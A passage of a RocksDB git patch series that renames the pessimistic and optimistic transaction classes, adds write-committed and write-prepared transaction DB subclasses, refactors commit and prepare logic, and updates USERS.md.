TransactionDBOptions& txn_db_options); - ~TransactionDBImpl(); + virtual ~PessimisticTransactionDB(); Status Initialize(const std::vector& compaction_enabled_cf_indices, const std::vector& handles); Transaction* BeginTransaction(const WriteOptions& write_options, const TransactionOptions& txn_options, - Transaction* old_txn) override; + Transaction* old_txn) override = 0; using StackableDB::Put; virtual Status Put(const WriteOptions& options, @@ -97,11 +98,12 @@ class TransactionDBImpl : public TransactionDB { TransactionLockMgr::LockStatusData GetLockStatusData() override; - private: + protected: void ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const TransactionOptions& txn_options = TransactionOptions()); + private: DBImpl* db_impl_; const TransactionDBOptions txn_db_options_; TransactionLockMgr lock_mgr_; @@ -122,5 +124,44 @@ class TransactionDBImpl : public TransactionDB { std::unordered_map transactions_; }; +// A PessimisticTransactionDB that writes the data to the DB after the commit. +// In this way the DB only contains the committed data. +class WriteCommittedTxnDB : public PessimisticTransactionDB { + public: + explicit WriteCommittedTxnDB(DB* db, + const TransactionDBOptions& txn_db_options) + : PessimisticTransactionDB(db, txn_db_options) {} + + explicit WriteCommittedTxnDB(StackableDB* db, + const TransactionDBOptions& txn_db_options) + : PessimisticTransactionDB(db, txn_db_options) {} + + virtual ~WriteCommittedTxnDB() {} + + Transaction* BeginTransaction(const WriteOptions& write_options, + const TransactionOptions& txn_options, + Transaction* old_txn) override; +}; + +// A PessimisticTransactionDB that writes data to DB after prepare phase of 2PC. +// In this way some data in the DB might not be committed. The DB provides +// mechanisms to tell such data apart from committed data. +class WritePreparedTxnDB : public PessimisticTransactionDB { + public: + explicit WritePreparedTxnDB(DB* db, + const TransactionDBOptions& txn_db_options) + : PessimisticTransactionDB(db, txn_db_options) {} + + explicit WritePreparedTxnDB(StackableDB* db, + const TransactionDBOptions& txn_db_options) + : PessimisticTransactionDB(db, txn_db_options) {} + + virtual ~WritePreparedTxnDB() {} + + Transaction* BeginTransaction(const WriteOptions& write_options, + const TransactionOptions& txn_options, + Transaction* old_txn) override; +}; + } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index ececec6d534..a2219e1a381 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -22,7 +22,7 @@ #include "util/cast_util.h" #include "util/string_util.h" #include "util/sync_point.h" -#include "utilities/transactions/transaction_db_impl.h" +#include "utilities/transactions/pessimistic_transaction_db.h" #include "utilities/transactions/transaction_util.h" namespace rocksdb { @@ -48,7 +48,7 @@ PessimisticTxn::PessimisticTxn(TransactionDB* txn_db, deadlock_detect_(false), deadlock_detect_depth_(0) { txn_db_impl_ = - static_cast_with_check(txn_db); + static_cast_with_check(txn_db); db_impl_ = static_cast_with_check(db_); Initialize(txn_options); } diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/transaction_impl.h index 8445b0a50ab..dce5c7b97e4 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/transaction_impl.h @@ -30,7 +30,7 @@ namespace rocksdb { -class TransactionDBImpl; +class PessimisticTransactionDB; class PessimisticTxn; // A transaction under pessimistic concurrency control. This class implements @@ -121,7 +121,7 @@ class PessimisticTxn : public TransactionBaseImpl { void Clear() override; - TransactionDBImpl* txn_db_impl_; + PessimisticTransactionDB* txn_db_impl_; DBImpl* db_impl_; // If non-zero, this transaction should not be committed after this time (in diff --git a/utilities/transactions/transaction_lock_mgr.cc b/utilities/transactions/transaction_lock_mgr.cc index 99e71eeb0de..95612cd3974 100644 --- a/utilities/transactions/transaction_lock_mgr.cc +++ b/utilities/transactions/transaction_lock_mgr.cc @@ -26,7 +26,7 @@ #include "util/murmurhash.h" #include "util/sync_point.h" #include "util/thread_local.h" -#include "utilities/transactions/transaction_db_impl.h" +#include "utilities/transactions/pessimistic_transaction_db.h" namespace rocksdb { @@ -115,7 +115,7 @@ TransactionLockMgr::TransactionLockMgr( mutex_factory_(mutex_factory) { assert(txn_db); txn_db_impl_ = - static_cast_with_check(txn_db); + static_cast_with_check(txn_db); } TransactionLockMgr::~TransactionLockMgr() {} diff --git a/utilities/transactions/transaction_lock_mgr.h b/utilities/transactions/transaction_lock_mgr.h index 6c0d1e99dc0..86a65783fdf 100644 --- a/utilities/transactions/transaction_lock_mgr.h +++ b/utilities/transactions/transaction_lock_mgr.h @@ -27,7 +27,7 @@ struct LockMap; struct LockMapStripe; class Slice; -class TransactionDBImpl; +class PessimisticTransactionDB; class TransactionLockMgr { public: @@ -61,7 +61,7 @@ class TransactionLockMgr { LockStatusData GetLockStatusData(); private: - TransactionDBImpl* txn_db_impl_; + PessimisticTransactionDB* txn_db_impl_; // Default number of lock map stripes per column family const size_t default_num_stripes_; diff --git a/utilities/transactions/write_prepared_transaction_impl.cc b/utilities/transactions/write_prepared_transaction_impl.cc index ded6bcb2bc6..c018e946047 100644 --- a/utilities/transactions/write_prepared_transaction_impl.cc +++ b/utilities/transactions/write_prepared_transaction_impl.cc @@ -21,7 +21,7 @@ #include "rocksdb/utilities/transaction_db.h" #include "util/string_util.h" #include "util/sync_point.h" -#include "utilities/transactions/transaction_db_impl.h" +#include "utilities/transactions/pessimistic_transaction_db.h" #include "utilities/transactions/transaction_impl.h" #include "utilities/transactions/transaction_util.h" From 4ca11b4b07ed7e108749f7dd8ddf037c641c3d58 Mon Sep 17 00:00:00 2001 From: janlzlabs Date: Sun, 6 Aug 2017 12:43:34 -0700 Subject: [PATCH 082/205] Update USERS.md Summary: I'd like to propose adding my company as a RocksDB user Closes https://github.com/facebook/rocksdb/pull/2694 Differential Revision: D5572113 Pulled By: ajkr fbshipit-source-id: 646143b955e3efddee56691cce912d7badaa6e8b --- USERS.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/USERS.md b/USERS.md index 37d33b436a3..7be093f9582 100644 --- a/USERS.md +++ b/USERS.md @@ -80,3 +80,6 @@ quasardb uses a heavily tuned RocksDB as its persistence layer. ## 360 Pika [360](http://www.360.cn/) [Pika](https://github.com/Qihoo360/pika) is a nosql compatible with redis. With the huge amount of data stored, redis may suffer for a capacity bottleneck, and pika was born for solving it. It has widely been widely used in many company + +## LzLabs +LzLabs is using RocksDB as a storage engine in their multi-database distributed framework to store application configuration and user data. From a9a4e89c386495d65e2afee33dcba6b09f072fe7 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Mon, 7 Aug 2017 08:27:49 -0700 Subject: [PATCH 083/205] Fix valgrind complaint about initialization Summary: Closes https://github.com/facebook/rocksdb/pull/2697 Differential Revision: D5573894 Pulled By: maysamyabandeh fbshipit-source-id: 8fc03ea8ea6f3f3bc0f68b64cf90243a70562dc4 --- include/rocksdb/utilities/transaction_db.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/include/rocksdb/utilities/transaction_db.h b/include/rocksdb/utilities/transaction_db.h index 548518f6008..a61234adcc2 100644 --- a/include/rocksdb/utilities/transaction_db.h +++ b/include/rocksdb/utilities/transaction_db.h @@ -77,7 +77,7 @@ struct TransactionDBOptions { // write only the committed data (WRITE_COMMITTED). The data could be written // before the commit phase. The DB then needs to provide the mechanisms to // tell apart committed from uncommitted data. - TxnDBWritePolicy write_policy; + TxnDBWritePolicy write_policy = TxnDBWritePolicy::WRITE_COMMITTED; }; struct TransactionOptions { From bdc056f8aa21b3bdae5f91821b273d80627f8392 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Mon, 7 Aug 2017 16:07:40 -0700 Subject: [PATCH 084/205] Refactor PessimisticTransaction Summary: This patch splits Commit and Prepare into lock-related logic and db-write-related logic. It moves lock-related logic to PessimisticTransaction to be reused by all children classes and movies the existing impl of db-write-related to PrepareInternal, CommitSingleInternal, and CommitInternal in WriteCommittedTxnImpl. Closes https://github.com/facebook/rocksdb/pull/2691 Differential Revision: D5569464 Pulled By: maysamyabandeh fbshipit-source-id: d1b8698e69801a4126c7bc211745d05c636f5325 --- CMakeLists.txt | 6 +- TARGETS | 6 +- db/db_impl.h | 6 +- src.mk | 6 +- utilities/blob_db/blob_db_impl.cc | 2 +- ...tion_impl.cc => optimistic_transaction.cc} | 26 ++-- ...action_impl.h => optimistic_transaction.h} | 18 +-- .../optimistic_transaction_db_impl.cc | 8 +- ...ion_impl.cc => pessimistic_transaction.cc} | 120 ++++++++++-------- ...ction_impl.h => pessimistic_transaction.h} | 47 ++++--- .../pessimistic_transaction_db.cc | 20 +-- .../transactions/pessimistic_transaction_db.h | 14 +- .../transactions/transaction_lock_mgr.cc | 16 +-- utilities/transactions/transaction_lock_mgr.h | 18 +-- ...nsaction_impl.cc => write_prepared_txn.cc} | 32 +++-- ...ransaction_impl.h => write_prepared_txn.h} | 24 ++-- 16 files changed, 197 insertions(+), 172 deletions(-) rename utilities/transactions/{optimistic_transaction_impl.cc => optimistic_transaction.cc} (83%) rename utilities/transactions/{optimistic_transaction_impl.h => optimistic_transaction.h} (82%) rename utilities/transactions/{transaction_impl.cc => pessimistic_transaction.cc} (82%) rename utilities/transactions/{transaction_impl.h => pessimistic_transaction.h} (86%) rename utilities/transactions/{write_prepared_transaction_impl.cc => write_prepared_txn.cc} (63%) rename utilities/transactions/{write_prepared_transaction_impl.h => write_prepared_txn.h} (77%) diff --git a/CMakeLists.txt b/CMakeLists.txt index 8209f30fe91..b4b568b74be 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -518,14 +518,14 @@ set(SOURCES utilities/spatialdb/spatial_db.cc utilities/table_properties_collectors/compact_on_deletion_collector.cc utilities/transactions/optimistic_transaction_db_impl.cc - utilities/transactions/optimistic_transaction_impl.cc + utilities/transactions/optimistic_transaction.cc utilities/transactions/transaction_base.cc utilities/transactions/pessimistic_transaction_db.cc utilities/transactions/transaction_db_mutex_impl.cc - utilities/transactions/transaction_impl.cc + utilities/transactions/pessimistic_transaction.cc utilities/transactions/transaction_lock_mgr.cc utilities/transactions/transaction_util.cc - utilities/transactions/write_prepared_transaction_impl.cc + utilities/transactions/write_prepared_txn.cc utilities/ttl/db_ttl_impl.cc utilities/write_batch_with_index/write_batch_with_index.cc utilities/write_batch_with_index/write_batch_with_index_internal.cc diff --git a/TARGETS b/TARGETS index e52f507074f..dcf2729e7bd 100644 --- a/TARGETS +++ b/TARGETS @@ -245,14 +245,14 @@ cpp_library( "utilities/spatialdb/spatial_db.cc", "utilities/table_properties_collectors/compact_on_deletion_collector.cc", "utilities/transactions/optimistic_transaction_db_impl.cc", - "utilities/transactions/optimistic_transaction_impl.cc", + "utilities/transactions/optimistic_transaction.cc", "utilities/transactions/transaction_base.cc", "utilities/transactions/pessimistic_transaction_db.cc", "utilities/transactions/transaction_db_mutex_impl.cc", - "utilities/transactions/transaction_impl.cc", + "utilities/transactions/pessimistic_transaction.cc", "utilities/transactions/transaction_lock_mgr.cc", "utilities/transactions/transaction_util.cc", - "utilities/transactions/write_prepared_transaction_impl.cc", + "utilities/transactions/write_prepared_txn.cc", "utilities/ttl/db_ttl_impl.cc", "utilities/write_batch_with_index/write_batch_with_index.cc", "utilities/write_batch_with_index/write_batch_with_index_internal.cc", diff --git a/db/db_impl.h b/db/db_impl.h index d89ea50cad8..d057f934524 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -631,9 +631,9 @@ class DBImpl : public DB { private: friend class DB; friend class InternalStats; - friend class PessimisticTxn; - friend class WriteCommittedTxnImpl; - friend class WritePreparedTxnImpl; + friend class PessimisticTransaction; + friend class WriteCommittedTxn; + friend class WritePreparedTxn; #ifndef ROCKSDB_LITE friend class ForwardIterator; #endif diff --git a/src.mk b/src.mk index 44c59fea7d4..30012d11f56 100644 --- a/src.mk +++ b/src.mk @@ -193,14 +193,14 @@ LIB_SOURCES = \ utilities/spatialdb/spatial_db.cc \ utilities/table_properties_collectors/compact_on_deletion_collector.cc \ utilities/transactions/optimistic_transaction_db_impl.cc \ - utilities/transactions/optimistic_transaction_impl.cc \ + utilities/transactions/optimistic_transaction.cc \ utilities/transactions/transaction_base.cc \ utilities/transactions/pessimistic_transaction_db.cc \ utilities/transactions/transaction_db_mutex_impl.cc \ - utilities/transactions/transaction_impl.cc \ + utilities/transactions/pessimistic_transaction.cc \ utilities/transactions/transaction_lock_mgr.cc \ utilities/transactions/transaction_util.cc \ - utilities/transactions/write_prepared_transaction_impl.cc \ + utilities/transactions/write_prepared_txn.cc \ utilities/ttl/db_ttl_impl.cc \ utilities/write_batch_with_index/write_batch_with_index.cc \ utilities/write_batch_with_index/write_batch_with_index_internal.cc \ diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 783c9d4ef1b..9e1623eb5c4 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -32,7 +32,7 @@ #include "util/random.h" #include "util/timer_queue.h" #include "utilities/transactions/optimistic_transaction_db_impl.h" -#include "utilities/transactions/optimistic_transaction_impl.h" +#include "utilities/transactions/optimistic_transaction.h" namespace { int kBlockBasedTableVersionFormat = 2; diff --git a/utilities/transactions/optimistic_transaction_impl.cc b/utilities/transactions/optimistic_transaction.cc similarity index 83% rename from utilities/transactions/optimistic_transaction_impl.cc rename to utilities/transactions/optimistic_transaction.cc index 044dded2365..882fbec4a51 100644 --- a/utilities/transactions/optimistic_transaction_impl.cc +++ b/utilities/transactions/optimistic_transaction.cc @@ -5,11 +5,9 @@ #ifndef ROCKSDB_LITE -#include "utilities/transactions/optimistic_transaction_impl.h" +#include "utilities/transactions/optimistic_transaction.h" -#include #include -#include #include "db/column_family.h" #include "db/db_impl.h" @@ -25,40 +23,40 @@ namespace rocksdb { struct WriteOptions; -OptimisticTransactionImpl::OptimisticTransactionImpl( +OptimisticTransaction::OptimisticTransaction( OptimisticTransactionDB* txn_db, const WriteOptions& write_options, const OptimisticTransactionOptions& txn_options) : TransactionBaseImpl(txn_db->GetBaseDB(), write_options), txn_db_(txn_db) { Initialize(txn_options); } -void OptimisticTransactionImpl::Initialize( +void OptimisticTransaction::Initialize( const OptimisticTransactionOptions& txn_options) { if (txn_options.set_snapshot) { SetSnapshot(); } } -void OptimisticTransactionImpl::Reinitialize( +void OptimisticTransaction::Reinitialize( OptimisticTransactionDB* txn_db, const WriteOptions& write_options, const OptimisticTransactionOptions& txn_options) { TransactionBaseImpl::Reinitialize(txn_db->GetBaseDB(), write_options); Initialize(txn_options); } -OptimisticTransactionImpl::~OptimisticTransactionImpl() { +OptimisticTransaction::~OptimisticTransaction() { } -void OptimisticTransactionImpl::Clear() { +void OptimisticTransaction::Clear() { TransactionBaseImpl::Clear(); } -Status OptimisticTransactionImpl::Prepare() { +Status OptimisticTransaction::Prepare() { return Status::InvalidArgument( "Two phase commit not supported for optimistic transactions."); } -Status OptimisticTransactionImpl::Commit() { +Status OptimisticTransaction::Commit() { // Set up callback which will call CheckTransactionForConflicts() to // check whether this transaction is safe to be committed. OptimisticTransactionCallback callback(this); @@ -75,7 +73,7 @@ Status OptimisticTransactionImpl::Commit() { return s; } -Status OptimisticTransactionImpl::Rollback() { +Status OptimisticTransaction::Rollback() { Clear(); return Status::OK(); } @@ -83,7 +81,7 @@ Status OptimisticTransactionImpl::Rollback() { // Record this key so that we can check it for conflicts at commit time. // // 'exclusive' is unused for OptimisticTransaction. -Status OptimisticTransactionImpl::TryLock(ColumnFamilyHandle* column_family, +Status OptimisticTransaction::TryLock(ColumnFamilyHandle* column_family, const Slice& key, bool read_only, bool exclusive, bool untracked) { if (untracked) { @@ -114,7 +112,7 @@ Status OptimisticTransactionImpl::TryLock(ColumnFamilyHandle* column_family, // // Should only be called on writer thread in order to avoid any race conditions // in detecting write conflicts. -Status OptimisticTransactionImpl::CheckTransactionForConflicts(DB* db) { +Status OptimisticTransaction::CheckTransactionForConflicts(DB* db) { Status result; auto db_impl = static_cast_with_check(db); @@ -127,7 +125,7 @@ Status OptimisticTransactionImpl::CheckTransactionForConflicts(DB* db) { true /* cache_only */); } -Status OptimisticTransactionImpl::SetName(const TransactionName& name) { +Status OptimisticTransaction::SetName(const TransactionName& /* unused */) { return Status::InvalidArgument("Optimistic transactions cannot be named."); } diff --git a/utilities/transactions/optimistic_transaction_impl.h b/utilities/transactions/optimistic_transaction.h similarity index 82% rename from utilities/transactions/optimistic_transaction_impl.h rename to utilities/transactions/optimistic_transaction.h index 6baec6962ec..b49bd6ab900 100644 --- a/utilities/transactions/optimistic_transaction_impl.h +++ b/utilities/transactions/optimistic_transaction.h @@ -26,13 +26,13 @@ namespace rocksdb { -class OptimisticTransactionImpl : public TransactionBaseImpl { +class OptimisticTransaction : public TransactionBaseImpl { public: - OptimisticTransactionImpl(OptimisticTransactionDB* db, + OptimisticTransaction(OptimisticTransactionDB* db, const WriteOptions& write_options, const OptimisticTransactionOptions& txn_options); - virtual ~OptimisticTransactionImpl(); + virtual ~OptimisticTransaction(); void Reinitialize(OptimisticTransactionDB* txn_db, const WriteOptions& write_options, @@ -67,20 +67,20 @@ class OptimisticTransactionImpl : public TransactionBaseImpl { void Clear() override; - void UnlockGetForUpdate(ColumnFamilyHandle* column_family, - const Slice& key) override { + void UnlockGetForUpdate(ColumnFamilyHandle* /* unused */, + const Slice& /* unused */) override { // Nothing to unlock. } // No copying allowed - OptimisticTransactionImpl(const OptimisticTransactionImpl&); - void operator=(const OptimisticTransactionImpl&); + OptimisticTransaction(const OptimisticTransaction&); + void operator=(const OptimisticTransaction&); }; // Used at commit time to trigger transaction validation class OptimisticTransactionCallback : public WriteCallback { public: - explicit OptimisticTransactionCallback(OptimisticTransactionImpl* txn) + explicit OptimisticTransactionCallback(OptimisticTransaction* txn) : txn_(txn) {} Status Callback(DB* db) override { @@ -90,7 +90,7 @@ class OptimisticTransactionCallback : public WriteCallback { bool AllowWriteBatching() override { return false; } private: - OptimisticTransactionImpl* txn_; + OptimisticTransaction* txn_; }; } // namespace rocksdb diff --git a/utilities/transactions/optimistic_transaction_db_impl.cc b/utilities/transactions/optimistic_transaction_db_impl.cc index 001ebefe1f3..d9db6fde07e 100644 --- a/utilities/transactions/optimistic_transaction_db_impl.cc +++ b/utilities/transactions/optimistic_transaction_db_impl.cc @@ -14,7 +14,7 @@ #include "rocksdb/db.h" #include "rocksdb/options.h" #include "rocksdb/utilities/optimistic_transaction_db.h" -#include "utilities/transactions/optimistic_transaction_impl.h" +#include "utilities/transactions/optimistic_transaction.h" namespace rocksdb { @@ -25,7 +25,7 @@ Transaction* OptimisticTransactionDBImpl::BeginTransaction( ReinitializeTransaction(old_txn, write_options, txn_options); return old_txn; } else { - return new OptimisticTransactionImpl(this, write_options, txn_options); + return new OptimisticTransaction(this, write_options, txn_options); } } @@ -81,8 +81,8 @@ Status OptimisticTransactionDB::Open( void OptimisticTransactionDBImpl::ReinitializeTransaction( Transaction* txn, const WriteOptions& write_options, const OptimisticTransactionOptions& txn_options) { - assert(dynamic_cast(txn) != nullptr); - auto txn_impl = reinterpret_cast(txn); + assert(dynamic_cast(txn) != nullptr); + auto txn_impl = reinterpret_cast(txn); txn_impl->Reinitialize(this, write_options, txn_options); } diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/pessimistic_transaction.cc similarity index 82% rename from utilities/transactions/transaction_impl.cc rename to utilities/transactions/pessimistic_transaction.cc index a2219e1a381..092b7132c25 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/pessimistic_transaction.cc @@ -5,7 +5,7 @@ #ifndef ROCKSDB_LITE -#include "utilities/transactions/transaction_impl.h" +#include "utilities/transactions/pessimistic_transaction.h" #include #include @@ -29,13 +29,13 @@ namespace rocksdb { struct WriteOptions; -std::atomic PessimisticTxn::txn_id_counter_(1); +std::atomic PessimisticTransaction::txn_id_counter_(1); -TransactionID PessimisticTxn::GenTxnID() { +TransactionID PessimisticTransaction::GenTxnID() { return txn_id_counter_.fetch_add(1); } -PessimisticTxn::PessimisticTxn(TransactionDB* txn_db, +PessimisticTransaction::PessimisticTransaction(TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options) : TransactionBaseImpl(txn_db->GetRootDB(), write_options), @@ -53,7 +53,7 @@ PessimisticTxn::PessimisticTxn(TransactionDB* txn_db, Initialize(txn_options); } -void PessimisticTxn::Initialize(const TransactionOptions& txn_options) { +void PessimisticTransaction::Initialize(const TransactionOptions& txn_options) { txn_id_ = GenTxnID(); txn_state_ = STARTED; @@ -84,7 +84,7 @@ void PessimisticTxn::Initialize(const TransactionOptions& txn_options) { } } -PessimisticTxn::~PessimisticTxn() { +PessimisticTransaction::~PessimisticTransaction() { txn_db_impl_->UnLock(this, &GetTrackedKeys()); if (expiration_time_ > 0) { txn_db_impl_->RemoveExpirableTransaction(txn_id_); @@ -94,12 +94,12 @@ PessimisticTxn::~PessimisticTxn() { } } -void PessimisticTxn::Clear() { +void PessimisticTransaction::Clear() { txn_db_impl_->UnLock(this, &GetTrackedKeys()); TransactionBaseImpl::Clear(); } -void PessimisticTxn::Reinitialize(TransactionDB* txn_db, +void PessimisticTransaction::Reinitialize(TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options) { if (!name_.empty() && txn_state_ != COMMITED) { @@ -109,7 +109,7 @@ void PessimisticTxn::Reinitialize(TransactionDB* txn_db, Initialize(txn_options); } -bool PessimisticTxn::IsExpired() const { +bool PessimisticTransaction::IsExpired() const { if (expiration_time_ > 0) { if (db_->GetEnv()->NowMicros() >= expiration_time_) { // Transaction is expired. @@ -120,12 +120,12 @@ bool PessimisticTxn::IsExpired() const { return false; } -WriteCommittedTxnImpl::WriteCommittedTxnImpl( +WriteCommittedTxn::WriteCommittedTxn( TransactionDB* txn_db, const WriteOptions& write_options, const TransactionOptions& txn_options) - : PessimisticTxn(txn_db, write_options, txn_options){}; + : PessimisticTransaction(txn_db, write_options, txn_options){}; -Status WriteCommittedTxnImpl::CommitBatch(WriteBatch* batch) { +Status WriteCommittedTxn::CommitBatch(WriteBatch* batch) { TransactionKeyMap keys_to_unlock; Status s = LockBatch(batch, &keys_to_unlock); @@ -163,7 +163,7 @@ Status WriteCommittedTxnImpl::CommitBatch(WriteBatch* batch) { return s; } -Status WriteCommittedTxnImpl::Prepare() { +Status PessimisticTransaction::Prepare() { Status s; if (name_.empty()) { @@ -192,12 +192,7 @@ Status WriteCommittedTxnImpl::Prepare() { txn_state_.store(AWAITING_PREPARE); // transaction can't expire after preparation expiration_time_ = 0; - WriteOptions write_options = write_options_; - write_options.disableWAL = false; - WriteBatchInternal::MarkEndPrepare(GetWriteBatch()->GetWriteBatch(), name_); - s = db_impl_->WriteImpl(write_options, GetWriteBatch()->GetWriteBatch(), - /*callback*/ nullptr, &log_number_, /*log ref*/ 0, - /* disable_memtable*/ true); + s = PrepareInternal(); if (s.ok()) { assert(log_number_ != 0); dbimpl_->MarkLogAsContainingPrepSection(log_number_); @@ -218,9 +213,20 @@ Status WriteCommittedTxnImpl::Prepare() { return s; } -Status WriteCommittedTxnImpl::Commit() { +Status WriteCommittedTxn::PrepareInternal() { + WriteOptions write_options = write_options_; + write_options.disableWAL = false; + WriteBatchInternal::MarkEndPrepare(GetWriteBatch()->GetWriteBatch(), name_); + Status s = + db_impl_->WriteImpl(write_options, GetWriteBatch()->GetWriteBatch(), + /*callback*/ nullptr, &log_number_, /*log ref*/ 0, + /* disable_memtable*/ true); + return s; +} + +Status PessimisticTransaction::Commit() { Status s; - bool commit_single = false; + bool commit_without_prepare = false; bool commit_prepared = false; if (IsExpired()) { @@ -234,25 +240,28 @@ Status WriteCommittedTxnImpl::Commit() { // our locks stolen. In this case the only valid state is STARTED because // a state of PREPARED would have a cleared expiration_time_. TransactionState expected = STARTED; - commit_single = std::atomic_compare_exchange_strong(&txn_state_, &expected, - AWAITING_COMMIT); + commit_without_prepare = std::atomic_compare_exchange_strong( + &txn_state_, &expected, AWAITING_COMMIT); TEST_SYNC_POINT("TransactionTest::ExpirableTransactionDataRace:1"); } else if (txn_state_ == PREPARED) { // expiration and lock stealing is not a concern commit_prepared = true; } else if (txn_state_ == STARTED) { // expiration and lock stealing is not a concern - commit_single = true; + commit_without_prepare = true; + // TODO(myabandeh): what if the user mistakenly forgets prepare? We should + // add an option so that the user explictly express the intention of + // skipping the prepare phase. } - if (commit_single) { + if (commit_without_prepare) { assert(!commit_prepared); if (WriteBatchInternal::Count(GetCommitTimeWriteBatch()) > 0) { s = Status::InvalidArgument( "Commit-time batch contains values that will not be committed."); } else { txn_state_.store(AWAITING_COMMIT); - s = db_->Write(write_options_, GetWriteBatch()->GetWriteBatch()); + s = CommitWithoutPrepareInternal(); Clear(); if (s.ok()) { txn_state_.store(COMMITED); @@ -261,21 +270,8 @@ Status WriteCommittedTxnImpl::Commit() { } else if (commit_prepared) { txn_state_.store(AWAITING_COMMIT); - // We take the commit-time batch and append the Commit marker. - // The Memtable will ignore the Commit marker in non-recovery mode - WriteBatch* working_batch = GetCommitTimeWriteBatch(); - WriteBatchInternal::MarkCommit(working_batch, name_); - - // any operations appended to this working_batch will be ignored from WAL - working_batch->MarkWalTerminationPoint(); + s = CommitInternal(); - // insert prepared batch into Memtable only skipping WAL. - // Memtable will ignore BeginPrepare/EndPrepare markers - // in non recovery mode and simply insert the values - WriteBatchInternal::Append(working_batch, GetWriteBatch()->GetWriteBatch()); - - s = db_impl_->WriteImpl(write_options_, working_batch, nullptr, nullptr, - log_number_); if (!s.ok()) { ROCKS_LOG_WARN(db_impl_->immutable_db_options().info_log, "Commit write failed"); @@ -304,7 +300,31 @@ Status WriteCommittedTxnImpl::Commit() { return s; } -Status WriteCommittedTxnImpl::Rollback() { +Status WriteCommittedTxn::CommitWithoutPrepareInternal() { + Status s = db_->Write(write_options_, GetWriteBatch()->GetWriteBatch()); + return s; +} + +Status WriteCommittedTxn::CommitInternal() { + // We take the commit-time batch and append the Commit marker. + // The Memtable will ignore the Commit marker in non-recovery mode + WriteBatch* working_batch = GetCommitTimeWriteBatch(); + WriteBatchInternal::MarkCommit(working_batch, name_); + + // any operations appended to this working_batch will be ignored from WAL + working_batch->MarkWalTerminationPoint(); + + // insert prepared batch into Memtable only skipping WAL. + // Memtable will ignore BeginPrepare/EndPrepare markers + // in non recovery mode and simply insert the values + WriteBatchInternal::Append(working_batch, GetWriteBatch()->GetWriteBatch()); + + auto s = db_impl_->WriteImpl(write_options_, working_batch, nullptr, nullptr, + log_number_); + return s; +} + +Status WriteCommittedTxn::Rollback() { Status s; if (txn_state_ == PREPARED) { WriteBatch rollback_marker; @@ -331,7 +351,7 @@ Status WriteCommittedTxnImpl::Rollback() { return s; } -Status PessimisticTxn::RollbackToSavePoint() { +Status PessimisticTransaction::RollbackToSavePoint() { if (txn_state_ != STARTED) { return Status::InvalidArgument("Transaction is beyond state for rollback."); } @@ -349,7 +369,7 @@ Status PessimisticTxn::RollbackToSavePoint() { // Lock all keys in this batch. // On success, caller should unlock keys_to_unlock -Status PessimisticTxn::LockBatch(WriteBatch* batch, +Status PessimisticTransaction::LockBatch(WriteBatch* batch, TransactionKeyMap* keys_to_unlock) { class Handler : public WriteBatch::Handler { public: @@ -372,12 +392,12 @@ Status PessimisticTxn::LockBatch(WriteBatch* batch, } virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + const Slice& /* unused */) override { RecordKey(column_family_id, key); return Status::OK(); } virtual Status MergeCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + const Slice& /* unused */) override { RecordKey(column_family_id, key); return Status::OK(); } @@ -427,7 +447,7 @@ Status PessimisticTxn::LockBatch(WriteBatch* batch, // If check_shapshot is true and this transaction has a snapshot set, // this key will only be locked if there have been no writes to this key since // the snapshot time. -Status PessimisticTxn::TryLock(ColumnFamilyHandle* column_family, +Status PessimisticTransaction::TryLock(ColumnFamilyHandle* column_family, const Slice& key, bool read_only, bool exclusive, bool untracked) { uint32_t cfh_id = GetColumnFamilyID(column_family); @@ -515,7 +535,7 @@ Status PessimisticTxn::TryLock(ColumnFamilyHandle* column_family, // Return OK() if this key has not been modified more recently than the // transaction snapshot_. -Status PessimisticTxn::ValidateSnapshot(ColumnFamilyHandle* column_family, +Status PessimisticTransaction::ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice& key, SequenceNumber prev_seqno, SequenceNumber* new_seqno) { @@ -539,19 +559,19 @@ Status PessimisticTxn::ValidateSnapshot(ColumnFamilyHandle* column_family, false /* cache_only */); } -bool PessimisticTxn::TryStealingLocks() { +bool PessimisticTransaction::TryStealingLocks() { assert(IsExpired()); TransactionState expected = STARTED; return std::atomic_compare_exchange_strong(&txn_state_, &expected, LOCKS_STOLEN); } -void PessimisticTxn::UnlockGetForUpdate(ColumnFamilyHandle* column_family, +void PessimisticTransaction::UnlockGetForUpdate(ColumnFamilyHandle* column_family, const Slice& key) { txn_db_impl_->UnLock(this, GetColumnFamilyID(column_family), key.ToString()); } -Status PessimisticTxn::SetName(const TransactionName& name) { +Status PessimisticTransaction::SetName(const TransactionName& name) { Status s; if (txn_state_ == STARTED) { if (name_.length()) { diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/pessimistic_transaction.h similarity index 86% rename from utilities/transactions/transaction_impl.h rename to utilities/transactions/pessimistic_transaction.h index dce5c7b97e4..a0162fa279c 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/pessimistic_transaction.h @@ -31,24 +31,23 @@ namespace rocksdb { class PessimisticTransactionDB; -class PessimisticTxn; // A transaction under pessimistic concurrency control. This class implements // the locking API and interfaces with the lock manager as well as the // pessimistic transactional db. -class PessimisticTxn : public TransactionBaseImpl { +class PessimisticTransaction : public TransactionBaseImpl { public: - PessimisticTxn(TransactionDB* db, const WriteOptions& write_options, + PessimisticTransaction(TransactionDB* db, const 